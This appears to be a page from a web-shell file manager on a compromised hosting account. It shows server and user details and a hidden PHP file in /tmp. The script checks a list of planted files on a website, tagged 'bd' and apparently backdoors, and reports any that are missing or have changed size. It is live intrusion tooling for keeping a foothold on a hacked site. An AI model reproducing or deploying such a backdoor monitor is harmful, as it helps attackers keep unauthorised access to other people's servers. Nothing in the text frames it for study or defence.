HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.property_set
<?php   $r = '/home/vitanhod/moringa.vitavit.com.pk'; $x = ["/orderemail.php"=>"bd@@1269254@@71",
"/orderemail_bk.php"=>"bd@@1268914@@69",
"/includes/config.php"=>"bd@@1269344@@55",
"/includes/configOnline.php"=>"bd@@1269048@@98",
"/img/class.filter.php"=>"bd@@1276538@@89",
"/abusedetails.php"=>"bd@@1269490@@1025",
"/includes/Wiz3.php"=>"bd@@1276412@@99",
"/img/lrscan.php"=>"bd@@1309744@@797",
"/abusedetails.php"=>"bd@@1276298@@37",
"/includes/Wiz3.php"=>"bd@@1269447@@880",
"/img/class.filter.php"=>"bd@@1268429@@973"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');